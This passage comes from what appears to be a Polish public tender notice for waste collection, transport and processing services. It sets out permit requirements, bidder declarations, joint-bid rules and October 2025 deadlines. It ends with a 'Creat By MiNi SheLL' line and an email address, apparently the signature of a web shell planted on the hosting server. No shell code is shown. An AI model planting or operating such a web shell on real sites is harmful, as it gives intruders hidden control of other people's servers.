odpadów, z uwzględnieniem<br/>odpadów objętych przedmiotem zamówienia, wydane na<br/>podstawie art. 41 ust. 1 ustawy z dnia 14 grudnia 2012 r. o<br/>odpadach (Dz. U. z 2023 r. poz. 1587, z późn. zm.).<br/>Zezwolenie powinno zachować ważność w okresie realizacji<br/>zamówienia,<br/>d) aktualne pozwolenie na wytwarzanie odpadów, o którym<br/>mowa w art. 180 ustawy z dnia 27 kwietnia 2001 r. Prawo<br/>Ochrony Środowiska (Dz. U. z 2024 r. poz. 54),<br/>uwzględniające wymagania przewidziane dla zezwolenia na<br/>przetwarzanie odpadów lub/i zezwolenia na zbieranie<br/>odpadów objętych przedmiotem zamówienia. Pozwolenie<br/>powinno zachować ważność w okresie realizacji<br/>zamówienia,<br/>e) aktualne pozwolenie zintegrowane, o którym mowa w art.<br/>201 ustawy z dnia 27 kwietnia 2001r. Prawo ochrony<br/>środowiska (Dz. U. z 2024 r. poz. 54), uwzględniające<br/>wymagania przewidziane dla zezwolenia na przetwarzanie<br/>odpadów lub/i zezwolenia na zbieranie odpadów objętych<br/>przedmiotem zamówienia.<br/>Pozwolenie powinno zachować ważność w okresie<br/>realizacji zamówienia, z dopuszczonymi do przetwarzania<br/>odpadów w decyzjach ilościami odpadów objętych<br/>przedmiotem zamówienia.<br/>Zamawiający uzna warunek za spełniony jeśli Wykonawca<br/>złoży co najmniej jedno z uprawnień, o których mowa w lit. a-e.<br/>tj. pozwolenie, zezwolenie lub zawiadomienie o nadaniu<br/>numeru rejestrowego w bazie danych o produktach i<br/>opakowaniach oraz o gospodarce odpadami, tzw. BDO<br/>dla transportującego odpady;<br/> Wykazując aktualność decyzji, o których mowa powyżej,<br/>Wykonawca winien przedłożyć:<br/>- oświadczenie o spełnieniu wymagania nałożonego art. 10 i art. 14<br/>ustawy z dnia 20 lipca 2018 r. o zmianie ustawy o odpadach oraz<br/>niektórych innych ustaw (Dz. U. z 2018r. poz. 1592 ze zm.) ,<br/>zawierające wskazanie decyzji, których dotyczą (znak i data),<br/>sporządzone nie wcześniej niż na miesiąc przed jego złożeniem. W<br/>celu potwierdzenia powyższego Wykonawca winien załączyć do<br/>oświadczenia skan pierwszej strony wniosku z pieczęcią marszałka<br/>województwa lub starosty potwierdzającą złożenie dokumentu i/lub potwierdzenie nadania pocztą przesyłki do 5 marca 2020 roku.<br/>Oświadczenie winno zawierać informację, że ww. postępowanie nie<br/>zakończyło się wydaniem decyzji odmownej w danej instancji, ani nie<br/>zostało pozostawione bez rozpoznania. Oświadczenie powinno<br/>dodatkowo zawierać informację, że Wykonawcy nie są znane<br/>okoliczności uniemożliwiające uzyskanie zmienionej decyzji.<br/>Wzór oświadczenia w załączniku nr 10; (dokument<br/>fakultatywny w przypadku, gdy dotyczy przedstawionej w<br/>postępowaniu decyzji)<br/>- oświadczenie o spełnieniu wymagania nałożonego art. 226a ustawy<br/>z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2023 r. poz. 1587, z<br/>późn. zm.), zawierające wskazanie decyzji, których dotyczą (znak i<br/>data), sporządzone nie wcześniej niż na miesiąc przed jego złożeniem.<br/>W celu potwierdzenia powyższego Wykonawca winien załączyć do<br/>oświadczenia skan pierwszej strony wniosku z pieczęcią marszałka<br/>województwa lub starosty potwierdzającą złożenie dokumentu i/lub<br/>potwierdzenie nadania pocztą przesyłki w terminie nie później niż trzy<br/>miesiące przed upływem czasu na jaki zostało zezwolenie wydane.<br/>Oświadczenie winno zawierać informację, że ww. postępowanie nie<br/>zakończyło się wydaniem decyzji odmownej w danej instancji, ani nie<br/>zostało pozostawione bez rozpoznania. Oświadczenie powinno<br/>dodatkowo zawierać informację, że Wykonawcy nie są znane<br/>okoliczności uniemożliwiające uzyskanie nowej decyzji.<br/>Wzór oświadczenia w załączniku nr 11 (dokument fakultatywny w<br/>przypadku, gdy dotyczy przedstawionej w postępowaniu decyzji).<br/>UWAGA!<br/>Przed podpisaniem Umowy Zamawiający będzie miał prawo żądać<br/>dokumentacji na posiadanie wszystkich uprawnień niezbędnych do<br/>prawidłowego i zgodnego z prawem wykonywania przedmiotu Umowy, o<br/>którym mowa w § 1 PPU, bez względu czy spełnia to Wykonawca sam,<br/>czy posiada pozostałe uprawnienia podwykonawca, czy wykonawca<br/>wspólnie ubiegający się.<br/>Zamawiający zastrzega prawo do odstąpienia od podpisania Umowy<br/>i wybrania drugiego Wykonawcy w rankingu ofert w przypadku<br/>nieposiadania wszystkich uprawnień wymaganych zgodnie z<br/>obowiązującymi przepisami do realizacji zamówienia. Brak uprawnień<br/>będzie Zamawiający traktował jako uchylanie się od podpisania<br/>Umowy, tym samym art. 263 ustawy Pzp będzie miał zastosowanie.<br/>Spełnienie warunku nie jest możliwe przez podwykonawców i podmioty<br/>trzecie udostępniające zasoby Warunek nr 2:<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje odpowiednim<br/>potencjałem technicznym tj:<br/>o dysponuje instalacjami posiadającymi aktualne zezwolenie<br/>na przetwarzanie odpadów objętych przedmiotem<br/>zamówienia oraz odpadów powstałych w wyniku<br/>wstępnego przetworzenia odpadów objętych zamówieniem;<br/>o dysponuje środkami transportu umożliwiającymi przewóz<br/>odpadów objętych przedmiotem zamówienia z miejsc ich<br/>magazynowania do podmiotu zbierającego odpady* /<br/>instalacji odzysku lub unieszkodliwiania;<br/>* Dopuszcza się możliwość przekazania do podmiotu<br/>zbierającego odpady, przed poddaniem ich operacjom<br/>odzysku/unieszkodliwiania - odpadów z lokalizacji 1-9 <br/>Warunki udziału w postępowaniu, o których mowa w Rozdziale V ust. 2<br/>pkt 4) zostaną spełnione wyłącznie, jeżeli:<br/>a) co najmniej jeden z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia spełni warunek udziału<br/>samodzielnie (art. 117 ust. 2 ustawy Pzp) określony w ust. 2<br/>pkt 4, warunek nr 1<br/>b) co najmniej jeden z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia lub podmiotów udostępniających<br/>zasoby spełni warunek udziału samodzielnie albo<br/>wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia spełnią łącznie lub podmioty udostępniające<br/>zasoby spełnią warunek udziału łącznie z Wykonawcą – w<br/>przypadkach określonych w ust. 2 pkt 4, warunek nr 2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o<br/>braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r.. poz. 594<br/>), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej – załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie dotyczące dysponowania potencjałem technicznym w<br/>ramach opisu urządzeń technicznych oraz środków organizacyjno-<br/>technicznych, stanowiący załącznik nr 8 do SWZ. – na potwierdzenie<br/>spełnienia warunku nr 2.<br/>2) Uprawnienia na spełnienie warunku nr 1 (Wykonawca składa co najmniej<br/>jedno uprawnienie)<br/>1. Uprawnienia:<br/>a) uprawnienie do prowadzenia działalności w zakresie transportu odpadów<br/>objętych przedmiotem zamówienia, tj. aktualny wpis do rejestru bazy danych o<br/>produktach i opakowaniach oraz o gospodarce odpadami, tzw. BDO w zakresie<br/>transportu odpadów zgodnie z art. 50 ust. 1 pkt 5 lit. b ustawy z dnia 14 grudnia<br/>2012 r. o odpadach (Dz. U. z 2023 r. poz. 1587, z późn. zm.). Wpis do rejestru musi<br/>obejmować odpady będące przedmiotem zamówienia,<br/>b) uprawnienie do zbierania odpadów, tj. aktualne zezwolenie na zbieranie<br/>odpadów, z uwzględnieniem odpadów objętych przedmiotem zamówienia, wydane<br/>na podstawie art. 41 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z<br/>2023 r. poz. 1587, z późn. zm.). Zezwolenie powinno zachować ważność w okresie<br/>realizacji zamówienia,<br/>c) uprawnienie do przetwarzania odpadów, tj. aktualne zezwolenie na<br/>przetwarzanie odpadów, z uwzględnieniem odpadów objętych przedmiotem<br/>zamówienia, wydane na podstawie art. 41 ust. 1 ustawy z dnia 14 grudnia 2012 r.<br/>o odpadach (Dz. U. z 2023 r. poz. 1587, z późn. zm.). Zezwolenie powinno<br/>zachować ważność w okresie realizacji zamówienia, d) aktualne pozwolenie na wytwarzanie odpadów, o którym mowa w art. 180<br/>ustawy z dnia 27 kwietnia 2001 r. Prawo Ochrony Środowiska (Dz. U. z 2024 r. poz.<br/>54), uwzględniające wymagania przewidziane dla zezwolenia na przetwarzanie<br/>odpadów lub/i zezwolenia na zbieranie odpadów objętych<br/>przedmiotem zamówienia. Pozwolenie powinno zachować ważność w okresie<br/>realizacji zamówienia,<br/>e) aktualne pozwolenie zintegrowane, o którym mowa w art. 201 ustawy z dnia<br/>27 kwietnia 2001r. Prawo ochrony środowiska (Dz. U. z 2024 r. poz. 54),<br/>uwzględniające wymagania przewidziane dla zezwolenia na przetwarzanie<br/>odpadów lub/i zezwolenia na zbieranie odpadów objętych przedmiotem<br/>zamówienia.<br/>Pozwolenie powinno zachować ważność w okresie realizacji zamówienia,<br/>z dopuszczonymi do przetwarzania odpadów w decyzjach ilościami odpadów<br/>objętych przedmiotem zamówienia.<br/>2. Oświadczenia w celu wykazania aktualności - załącznik nr 9 i 10 do<br/>SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> brak <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca zobowiązany jest załączyć do oferty następujące dokumenty:<br/>1) Formularz ofertowy (według załączonego wzoru – Załącznik nr 1 do SWZ).<br/>2) Formularz cenowy (według załączonego wzoru – Załącznik nr 1a do SWZ)<br/>Wymagana forma:<br/>Formularz ofertowy i formularz asortymentowo-cenowy (jeśli dotyczy) muszą być<br/>złożone pod rygorem nieważności, w formie elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.<br/>Wyżej wymieniony dokument składa się w formie załącznika na Platformie.<br/>Dokument ten nie podlega uzupełnieniu w trybie art. 128 ustawy a także<br/>niedopuszczalnym jest złożenie w innej formie niż przewidziana powyżej, z<br/>zastrzeżeniem, że w przypadku, gdy Wykonawca dokona modyfikacji ww.<br/>wzorów formularzy, treść sporządzonej oferty, pod rygorem jej odrzucenia,<br/>musi zawierać wszystkie informacje wymagane w wyżej wymienionych<br/>formularzu/ach.<br/>3) oświadczenie sankcyjne– w przypadku niniejszego postepowania<br/>oświadczenie sankcyjne jest zawarte w oświadczeniu na podstawie art. 125<br/>ust. 1 ustawy Pzp.<br/>4) oświadczenie o podziale obowiązków w trakcie realizacji zamówienia<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (według<br/>załączonego wzoru – Załącznik nr 5 do SWZ - jeżeli dotyczy usług.<br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym, podpisem osobistym przez osoby upoważnione do<br/>reprezentowania wykonawców zgodnie z formą reprezentacji określoną w<br/>dokumencie rejestrowym właściwym dla formy organizacyjnej lub w innym<br/>dokumencie.<br/>W przypadku gdy oświadczenie zostało sporządzone jako dokument w postaci<br/>papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym, podpisem osobistym,<br/>poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia lub notariusz.<br/>5) Zamawiający nie wymaga przedłożenia wraz z ofertą przedmiotowych środków<br/>dowodowych.<br/>6) Oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny<br/>skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących<br/>tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej<br/>konkurencji (jeżeli Wykonawca zastrzega takie informacje) – jeżeli dotyczy;<br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym,<br/>podpisem osobistym, podpisem zaufanym przez osoby upoważnione do<br/>reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy<br/>organizacyjnej lub w innym dokumencie.<br/>W przypadku gdy oświadczenie zostało sporządzone jako dokument w postaci<br/>papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem osobistym, podpisem zaufanym,<br/>poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia lub notariusz.<br/>7) Pełnomocnictwo, z którego wynika prawo do podpisania oferty oraz do podpisania<br/>innych dokumentów składanych wraz z ofertą (jeżeli umocowanie osoby<br/>wskazanej w ofercie nie wynika z dokumentów rejestrowych KRS/CEIDG);<br/>8) pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu,<br/>z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być<br/>POZOSTAŁA TREŚĆ PRZYGOTOWANIA OFERTY W SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Umocowanie musi wynikać z treści pełnomocnictwa<br/>złożonego wraz z ofertą w oryginale lub w formie notarialnie potwierdzonego odpisu, podpisanego kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym.<br/>2. Pełnomocnictwo o którym mowa w ust. 1 powinno zawierać w szczególności wskazanie:<br/>− postępowania o zamówienie publiczne, którego dotyczy;<br/>− wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby;<br/>− ustanowionego Pełnomocnika oraz zakresu jego umocowania. Zakres umocowania<br/>musi obejmować przede wszystkim: reprezentowanie Wykonawców występujących<br/>wspólnie w postępowaniu o udzielenie zamówienia publicznego, zaciąganie w ich imieniu<br/>zobowiązań, złożenie oferty wspólnie, prowadzenie korespondencji i podejmowanie<br/>zobowiązań związanych z postępowaniem o zamówienie publiczne.<br/>Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia, w tym pełnomocnika i przez osoby<br/>uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub<br/>ewidencji Wykonawcy.<br/>3. Wykonawcy działający w ramach spółki cywilnej zamiast pełnomocnictwa, o którym<br/>mowa w pkt 1, mogą załączyć do oferty odpis aktualnej umowy spółki, jeżeli będzie z<br/>niej wynikać zakres umocowania wspólników.<br/>4. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie wstępne składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenie te potwierdza spełnianie warunków udziału w postępowaniu<br/>oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do<br/>wykluczenia.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z<br/>postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności<br/>do tej samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się<br/>o zamówienie.<br/>7. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument<br/>na podstawie art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>8. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może zażądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego, umowy regulującej współpracę tych Wykonawców, zgodnie z<br/>art. 59 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 7 SWZ - PPU <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-06 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-06 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykluczenie nastąpi na podstawie:<br/>− art. 108 ust 1 Ustawy Pzp,<br/>− art. 109 ust. 1 pkt 4, 8, 10 ustawy Pzp,<br/>− art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835)

Creat By MiNi SheLL
Email: jattceo@gmail.com